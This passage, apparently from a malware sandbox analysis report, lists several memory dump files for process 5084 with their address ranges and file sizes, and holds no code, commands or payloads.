
    600KB

  • memory/5084-6869-0x0000000006230000-0x000000000624A000-memory.dmp

    Filesize

    104KB

  • memory/5084-6870-0x0000000006280000-0x00000000062A2000-memory.dmp

    Filesize

    136KB

  • memory/5084-6871-0x00000000072F0000-0x0000000007894000-memory.dmp

    Filesize

    5.6MB

  • memory/5084-6866-0x0000000005D30000-0x0000000005D4E000-memory.dmp

    Filesize

    120KB

  • memory/5084-6865-0x0000000005720000-0x0000000005A74000-memory.dmp

    Filesize

    3.3MB

  • memory/5084-6852-0x0000000004E20000-0x0000000005448000-memory.dmp

    Filesize

    6.2MB

  • memory/5084-6854-0x0000000005550000-0x00000000055B6000-memory.dmp

    Filesize

    408KB

  • memory/5084-6855-0x00000000056B0000-0x0000000005716000-memory.dmp

    Filesize

    408KB

  • memory/5084-6853-0x0000000004D70000-0x0000000004D92000-memory.dmp

    Filesize

    136KB